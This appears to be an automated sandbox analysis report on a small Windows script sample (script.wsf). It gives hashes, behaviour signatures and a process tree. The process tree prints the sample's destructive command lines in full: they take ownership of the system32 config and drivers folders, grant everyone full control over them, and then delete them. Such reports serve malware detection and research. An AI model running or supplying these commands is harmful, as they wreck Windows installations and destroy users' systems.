Analysis
-
max time kernel
11s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:44
Static task
static1
Behavioral task
behavioral1
Sample
script.wsf
Resource
win7-20240704-en
General
-
Target
script.wsf
-
Size
3KB
-
MD5
0355b976d816c3dafeda740c75450a08
-
SHA1
98de5b1ee4c653658966effecf248bf7a8df7cd1
-
SHA256
7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
-
SHA512
2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2596 takeown.exe 2068 takeown.exe 3064 icacls.exe 1464 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2596 takeown.exe 2068 takeown.exe 3064 icacls.exe 1464 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2068 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2576 wrote to memory of 2756 2576 cmd.exe WScript.exe PID 2576 wrote to memory of 2756 2576 cmd.exe WScript.exe PID 2576 wrote to memory of 2756 2576 cmd.exe WScript.exe PID 2756 wrote to memory of 2760 2756 WScript.exe cmd.exe PID 2756 wrote to memory of 2760 2756 WScript.exe cmd.exe PID 2756 wrote to memory of 2760 2756 WScript.exe cmd.exe PID 2756 wrote to memory of 2636 2756 WScript.exe cmd.exe PID 2756 wrote to memory of 2636 2756 WScript.exe cmd.exe PID 2756 wrote to memory of 2636 2756 WScript.exe cmd.exe PID 2760 wrote to memory of 2596 2760 cmd.exe takeown.exe PID 2760 wrote to memory of 2596 2760 cmd.exe takeown.exe PID 2760 wrote to memory of 2596 2760 cmd.exe takeown.exe PID 2760 wrote to memory of 3064 2760 cmd.exe icacls.exe PID 2760 wrote to memory of 3064 2760 cmd.exe icacls.exe PID 2760 wrote to memory of 3064 2760 cmd.exe icacls.exe PID 2636 wrote to memory of 2068 2636 cmd.exe takeown.exe PID 2636 wrote to memory of 2068 2636 cmd.exe takeown.exe PID 2636 wrote to memory of 2068 2636 cmd.exe takeown.exe PID 2636 wrote to memory of 1464 2636 cmd.exe icacls.exe PID 2636 wrote to memory of 1464 2636 cmd.exe icacls.exe PID 2636 wrote to memory of 1464 2636 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2596
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1464
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD50355b976d816c3dafeda740c75450a08
SHA198de5b1ee4c653658966effecf248bf7a8df7cd1
SHA2567786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
SHA5122aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779
-
Filesize
79B
MD5edc6cfebfd829729d9fc80aaaf02d193
SHA16d04bf8c7b542301f7eb77eeceed16969053537c
SHA256d0391b24b4bb809ba05a9b9e3fbee72a8b39381b16567de0ca7d9f403211cb47
SHA5128afab19929d1bc3fe4d878ee7dd0b711834e53564afdf8e7d0a7186d1f01b35f5f4aeba4d3c5c964e2fbda08203611dc8bd140b717d3e579dc4b3f1684e3908c
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d